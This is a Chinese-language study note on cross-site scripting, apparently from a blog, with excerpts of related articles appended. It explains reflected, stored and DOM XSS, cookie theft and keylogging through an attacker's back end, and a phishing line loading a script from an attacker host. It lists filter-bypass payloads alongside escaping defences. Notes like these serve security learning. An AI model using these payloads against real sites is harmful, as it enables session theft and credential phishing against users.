XSS - 漏洞

我需要的爱就在我的心里,其他人只是让我记得那份早已存在于内心的爱,一个去谈恋爱的人就像一个水槽里面有水,这个水就是你爱自己的程度,我爱你是因为我跟你在一起我的样子,就是你把我激发起来你让我变得更好了,但是前提是我也很爱我自己

真相不重要,结果是怎样才最重要。死不死不是别人说了算的,要看你自己愿不愿意。-----大上海2012

跨站脚本漏洞概述:

跨站脚本漏洞类型及测试流程:

1、在目标站点上找到输入点,比如查询接口,留言板等;

2、输入一组 特殊字符 + 唯一识别字符,点击提交后,查看返回得源码,是否有做对应的处理;或者看提交的数据是否有被过滤掉;

3、通过搜索定位到唯一字符,结合唯一字符前后语法确认是否可以构造执行 js 的条件 (构造闭合)

4、提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;

TIPS:

1.一般查询接口容易出现反射型XSS,留言板容易出现存储型XSS

2.由于后台可能存在过滤措施,构造的 js 可能会被过滤掉,而无法生效,或者环境限制了执行(浏览器);

3.通过变化不同的 script 尝试绕过后台过滤机制;

反射型XSS(get&post)的原理分析:

从反射型的XSS (get)弹窗开始认识xss漏洞;如果表单限制了长度,有时候可以在 F12 查看元素 把长度改掉;get 的XSS漏洞利用起来是比较容易的。

存储型XSS原理分析:

存储型xss是会被存到数据库的,而反射型不会存放到数据库;危害性会更加大因为是存到到了数据库 或者 配置文件中的;

Dom型XSS原理分析:

XSS纯前端的操作,会在表单获取输入的字符;还有一个 XSS-S 这个是在 url 获取输入的字符;

  XSS的危害-获取cookie 的原理

    get、post;;如何获取 cookie ,攻击者搭建xss平台手机cookie;

    GET型XSS利用:获取cookie,GET型的参数是在 URL 里面的

    1.用户访问 XSS 页面,触发脚本,服务端返回 带恶意JS 的页面

    2.用户执行脚本,发送窃取数据 cookie 给攻击者后台,

    3.攻击者伪造用户登录,造成破坏

    POST型XSS利用:

    1.Requset伪造页面,触发表单

    2.页面 JS 自动 POST 表单数据,触发XSS

    3.执行 JS ,窃取cookie;;;当用户访问我们的表单后就等于攻击完成,访问表单是因为表单有恶意代码,恶意代码就是 docment.cookie 这样获取用户的cookie;这个表单帮用户请求了一个请求这个表单就是存在XSS漏洞的页面 去提交以个js恶意代码 这个恶意代码就是获取本地的 cookie  发送给我的攻击者的xss后台; ;post的这样漏洞就是要自己搭建一个表单页面自动提交页面;让用户访问;

  XSS危害-XSS进行钓鱼原理

    用jis写一个src访问xss后台的一个页面 页面会弹出来需要你登录才能查看,然后我们这个链接在重定向另一个代码保存刚刚的用户和密码;

    <script src="http://ip/xxx/xxx/xxx/xxx.html"></script>

    

  XSS危害-XSS获取键盘记录原理

    跨域情况 端口 子域名 协议 不同都是跨域;;

    跨域 - 同源策略:为了安全考虑,所有浏览器都约定了 同源策略,同源策略规定,两个不同域名之间不能使用 JS 进行交互操作;比如:x.com 域名下的 JS 并不能操作 y.com域名下的对象;

    如果想要跨域操作,需要管理员进行特殊的配置;

    Tips:下面这些标签跨域加载资源是不受同源策略限制的。

    <script src="">  // JS,加载到本地执行

    <img src="">    // 图片

    <link href="">   // css

    <iframe src="">  // 任意资源

    如果没有同源策略 攻击者向 A 发送一个恶意链接 urlb:www.盗取你的cookie.com (这个链接嵌入很多恶意的 JS 代码)这个代码可以直接盗取你的淘宝cookie 这样子的话 不同xss 也不同其他漏洞,这样子只要发一个代码恶意JS 的代码就可以读取 cookie ,这样子的话前端就乱了,所以所有浏览器都有同源策略;

    event.keyCode 方法 用来获取用户键盘的方法 然后可以调用异步POST请求发送到后台

    ajxs 默认是不可以跨域的;;大概------------

    

    header("Access-Control-Allow-Origin:*");  加了一个这样的东西就可以了;;

  

    XSS盲打原理:

      盲打主要说的是一种场景;盲打的话 在前端显示不了的,输入后  后台保存了下来 然后在后台执行了;如果我们输入了一段恶意代码获取cookie,当后台管理员登录的时候就会获取它的cookie;

      XSS的过滤和绕过

      XSS输出在 hrep 和 js 中的案例分析

      XSS常见防范措施

百度 OWASP 有一些相关学习的东西;;;

XSS是一种发生在 Web 前端的漏洞,所以其危害的对象也主要是前端用户。

XSS漏洞可以用来进行钓鱼攻击、前端 js 挖矿、用户 cookie 获取,甚至可以结合浏览器自身漏洞对用户进行远程控制等;

XSS大概攻击流程:略

跨站脚本漏洞常见类型:危害:存储型 > 反射型 > DOM型

反射型:交互的数据一般不会被存在在数据库里面,一次性,所见即所得,一般出现在查询类页面等;

存储型:交互得数据会被存在在数据库里面,永久性存储,一般出现在留言板,注册等页面;

DOM型:不与后台服务器产生数据交互,是一种通过DOM操作前端代码输出得时候产生得问题,一次性也属于反射型;

XSS漏洞得主要原因是程序对 输入 和 输出得控制不够严格,导致 精心构造 得脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害;

XSS 绕过 - 过滤 - 转换

1.前端限制绕过,直接抓包重放,或者修改HTML 前端代码;

2.大小写,比如:<SCRIPT>aLeRT(111)</sCRIpt>

3.拼凑:<scri<script>pt>alert(111)<scri<script>pt>

4.使用注释进行干扰:<scri<!--test-->pt>alert(111)</sc<!--test-->ript>

XSS 绕过 - 过滤 - 编码

后台过滤了特殊字符,比如<script> 标签,当该标签可以被各种编码,后台不一定会过滤,当浏览器对该编码进行识别时,会翻译成正常的标签,从而执行;

使用编码时 需要注意编码在输出点是否会被正常识别和翻译;;

alert(‘xss‘) 进行URL编码 可以执行吗?

alert%28%27xss%27%29  并不会执行,因为这些属性标签并不会正常解析这些编码;;

但可以进行 HTML 编码就可以了

XSS绕过的方法有很多,取决于思路和对前端技术的掌握程度;;

<ScRipT>alert(111)</ScRipT>

<img src= x onerror="alert(aaa)">

XSS还是比较灵活的,主要看自己够不够风骚;

XSS  ---  htmlspecialchars 是一个 php 的函数 默认对  “  过滤不对  ‘  guolv

XSS 常见防范措施:输入做过滤,输出做转义;

 过滤::比如输入手机号,那么只允许输入手机格式的数字

转义:所有输出到前端的数据根据输出点进行转义,比如输出到 html 中进行 html 实体转义,输入到 JS 就进行 JS 转义;

XSS之hrep:a 标签 href :javascript:alert(111) 有可能有输出;href 做输出,一般 href是做超链接的,所以在输入的时候只允许 http https 才允许在这里输出;

XSS之JS :如何去构造闭合 把前面的变量闭合掉

<script>

  $dd=‘x‘ </script> <script>alert(‘xss’)</script>

在中间 加入一个 </script> 去闭合前面的 <script>

如果进行了HTML实体编码,虽然解决XSS的问题,但是实体编码后,在JS里面不会进行翻译,所以在JS的输出点应该使用 \ 对特殊字符进行转义;

学习所用;写得乱七八糟;觉得自己看回来都有点难看懂;

原文地址:https://www.cnblogs.com/H-hy/p/11531086.html

时间: 2024-10-09 22:55:53

XSS - 漏洞的相关文章

JSONP存在的JSON Hijacking漏洞以及与csrf/xss漏洞的关系

在实习过程中接触过所谓的JSON Hijacking 漏洞,但最近在写论文时发现理解得不深,好像跟xss与csrf又有点区别与联系,索性深入学习了下 JSONP. 下面一段话截取自:http://stackoverflow.com/questions/2067472/what-is-jsonp-all-about   仔细看看就比较清晰了. Say you're on domain abc.com, and you want to make a request to domain xyz.com

XSS漏洞

跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取信息 坚决不要相信任何用户输入并过滤所有特殊字符.这样既可消灭绝大部分的XSS攻击.另一个建议是输出页面时将 < 和 > 变换成 < 和 >.要记住,XSS漏洞极具破坏性,一旦被利用,它会给你的事业带来极大的损害.攻击者会将这些漏洞公之于众,这会在用户隐私的问题上大大降低你的 网站的用户信赖度.当然,仅仅将 ( 和 ) 变换成 < 和 > 是不够的,最好将 ( 和 ) 变换成 ( 和 ),# 和 & 变

WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案

对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避免后知后觉的犯下大错,专门参考大量前辈们的心得,小小的总结一下,欢迎大家拍砖啊 一.跨站脚本攻击(XSS) 跨站脚本攻击的原理 XSS又叫CSS (Cross Site Script) ,跨站脚本攻击.它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时

XSS攻击:SOHU视频XSS漏洞导致其用户成为DDOS肉鸡

XSS又叫CSS (Cross Site Script) ,跨站脚本攻击.恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的. from:http://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html incapsula发现其一个客户遭受了应用层的DDos攻击. 大概有22000的互联网用户对其网站发起了2000万的GET请求. 

XSS漏洞实例利用

上一篇说了一下XSS的原理,相信大家对XSS的原理有了一定的了解.今天给大家分享一下XSS漏洞的实例利用. 环境: window 7 64位一台 火狐浏览器就位 外网云服务器一枚(我自己买的...) 可XSS网站一匹 获取Cookie的JS代码一套 好了,以上就是需要准备的东西,没有的外网云服务器(外网IP)的可以百度一下XSS利用的公开平台,自己研究下怎么用(我的服务器就不公开了,太渣了,只是用来做实验没法公开...) 现在我们开始一步一步的进行XSS漏洞利用 0x00  ....biubiu

一个跨域请求的XSS漏洞

场景回顾 一个表单进行跨域提交的方式有很多,我们使用的采用隐藏iframe,在本域下放一个代理页面,通过服务端配合完成一次完整的请求. 首先,部署proxy.html代理页面.这个页面处理服务端返回的数据,并执行接口的回调函数.接口请求成功后,返回的是: <script>location.href='http://www.a.com/proxy.html?fun=callback&a=1&b=2&c=3';</script> proxy页面,解析服务端传回的

asp.net初级 Web原则 xss漏洞

1.XSS (Cross-Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞.指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的, 比如获取用户的Cookie,导航到恶意网站,携带木马等. 2.     Dom-Based XSS漏洞       威胁用户个体 Stored XSS(存储式XSS漏洞)    威胁的将是大量的用户 3.asp中默认对请求对象的数据进行了校验,如果数据中含有潜在

BruteXSS:Xss漏洞扫描脚本

今天给大家进行汉化改进的是一款脚本工具:BruteXSS,这款脚本能自动进行插入XSS,而且可以自定义攻击载荷. 该脚本也同时提供包含了一些绕过各种WAF(Web应用防护系统)的语句. 0×01简介 简单的介绍一下这个工具吧:BruteXSS是一个非常强大和快速的跨站点脚本暴力注入.它用于暴力注入一个参数.该BruteXSS从指定的词库加载多种有效载荷进行注入并且使用指定的载荷和扫描检查这些参数很容易受到XSS漏洞.得益于非常强大的扫描功能.在执行任务时, BruteXSS是非常准确而且极少误报

使用Fiddler的X5S插件查找XSS漏洞

OWASP top 10的安全威胁中的CrossSite Scripting(跨站脚本攻击),允许攻击者通过浏览器往网站注入恶意脚本.这种漏洞经常出现在web应用中需要用户输入的地方,如果网站有XSS漏洞,攻击者就可以通过这种漏洞向浏览网站的用户发送恶意脚本,同时也可以利用该漏洞偷取sessionid,用来劫持用户帐户的会话. 所以网站开发者必须针对这种攻击进行适当的测试,必须过滤网站的每个输入及输出.为了使漏洞检测更容易,也可以使用各种扫描器,有很多自动或手动工具可以帮我们查找这些漏洞.X5S

XSS漏洞自动化攻击工具XSSer

XSS漏洞自动化攻击工具XSSer XSS是Web应用常见的漏洞.利用该漏洞,安全人员在网站注入恶意脚本,控制用户浏览器,并发起其他渗透操作.XSSer是Kali Linux提供的一款自动化XSS攻击框架.该工具可以同时探测多个网址.如果发现XSS漏洞,可以生成报告,并直接进行利用,如建立反向连接.为了提供攻击效率,该工具支持各种规避措施,如判断XSS过滤器.规避特定的防火墙.编码规避.同时,该工具提供丰富的选项,供用户自定义攻击,如指定攻击载荷.设置漏洞利用代码等.